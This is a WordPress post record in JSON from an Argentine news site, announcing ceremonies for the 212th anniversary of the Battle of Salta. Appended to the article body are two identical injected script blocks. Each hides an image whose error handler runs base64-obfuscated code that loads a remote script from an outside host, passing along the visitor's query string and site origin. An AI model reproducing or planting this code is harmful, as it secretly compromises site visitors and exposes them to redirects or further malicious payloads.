{"id":4860,"date":"2025-02-20T12:09:01","date_gmt":"2025-02-20T15:09:01","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4860"},"modified":"2025-08-13T23:40:21","modified_gmt":"2025-08-14T02:40:21","slug":"hoy-se-conmemorara-el-212-aniversario-de-la-batalla-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4860","title":{"rendered":"Hoy se conmemorar\u00e1 el 212\u00b0 aniversario de la Batalla de Salta"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\"><em>Los actos oficiales comenzaron a las 09:30 en la plaza General Manuel Belgrano. Posteriormente, las autoridades se trasladan al monumento 20 de Febrero para participar del tradicional desfile.<\/em><\/h3>\n\n\n\n<p>Se realizar\u00e1n hoy los actos centrales en conmemoraci\u00f3n del 212\u00ba aniversario de la Batalla de Salta.<br><br>Las actividades en la plaza General Manuel Belgrano, con el izamiento de las banderas Argentina y de Salta, entonaci\u00f3n del Himno Nacional, ofrenda floral y finalizar\u00e1 con palabras a cargo de un representante del Instituto Belgraniano.<br><br>Posteriormente, las autoridades se trasladar\u00e1n al Monumento 20 de Febrero para proseguir con la conmemoraci\u00f3n.<\/p>\n\n\n\n<p>Tras la colocaci\u00f3n de ofrendas florales en el monumento, se realizar\u00e1 un toque de silencio, entonaci\u00f3n del Himno Nacional Argentino, invocaci\u00f3n religiosa y palabras conmemorativas. Posteriormente se realizar\u00e1 el tradicional desfile.<br><br>Las actividades centrales se transmitir\u00e1n por las redes sociales del Gobierno de la provincia de Salta:&nbsp;<a href=\"https:\/\/youtube.com\/live\/r204AEeIjHU?feature=share\">https:\/\/youtube.com\/live\/r204AEeIjHU?feature=share<\/a>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los actos oficiales comenzaron a las 09:30 en la plaza General Manuel Belgrano. Posteriormente, las autoridades se trasladan al monumento 20 de Febrero para participar del tradicional desfile. Se realizar\u00e1n hoy los actos centrales en conmemoraci\u00f3n del 212\u00ba aniversario de la Batalla de Salta. Las actividades en la plaza General Manuel Belgrano, con el izamiento [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4861,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-4860","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4860"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4860"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4860\/revisions"}],"predecessor-version":[{"id":6568,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4860\/revisions\/6568"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4861"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4860"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4860"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4860"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}